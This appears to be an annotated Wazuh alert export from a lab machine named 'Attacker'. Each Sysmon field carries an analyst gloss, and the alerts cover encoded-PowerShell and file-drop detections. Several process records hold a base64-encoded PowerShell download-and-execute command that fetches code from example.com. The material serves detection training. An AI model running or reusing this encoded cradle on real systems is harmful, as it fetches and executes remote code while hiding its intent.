data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 27 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534218.1073340 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:04.6354631Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282462 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:04.632
ProcessGuid: {94294ddc-bcd3-680a-c80a-000000000e00}
ProcessId: 11368
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zrwibxxr.3hb.ps1
CreationUtcTime: 2025-04-24 22:36:04.632
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:04.632 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd3-680a-c80a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11368 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zrwibxxr.3hb.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:04.632 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 24 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534218.1076109 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:06.3023920Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282529 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:05.384
ProcessGuid: {94294ddc-bcd5-680a-cc0a-000000000e00}
ProcessId: 11096
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcd3-680a-c80a-000000000e00}
ParentProcessId: 11368
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:05.384 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd5-680a-cc0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11096 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcd3-680a-c80a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11368 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 28 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534218.1084180 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:06.5107228Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282532 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:06.494
ProcessGuid: {94294ddc-bcd5-680a-cc0a-000000000e00}
ProcessId: 11096
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4b14azk2.mml.ps1
CreationUtcTime: 2025-04-24 22:36:06.494
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:06.494 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd5-680a-cc0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11096 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4b14azk2.mml.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:06.494 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534219.1086949 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:07.3943395Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2403 Incremental log record number – handy for timeline order.
data.win.system.processID: 14228 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:07Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-25T22:31:07Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 25 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534219.1088531 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:08.7114133Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282582 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:07.440
ProcessGuid: {94294ddc-bcd7-680a-d00a-000000000e00}
ProcessId: 652
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcd5-680a-cc0a-000000000e00}
ParentProcessId: 11096
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:07.440 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcd7-680a-d00a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 652 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcd5-680a-cc0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11096 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
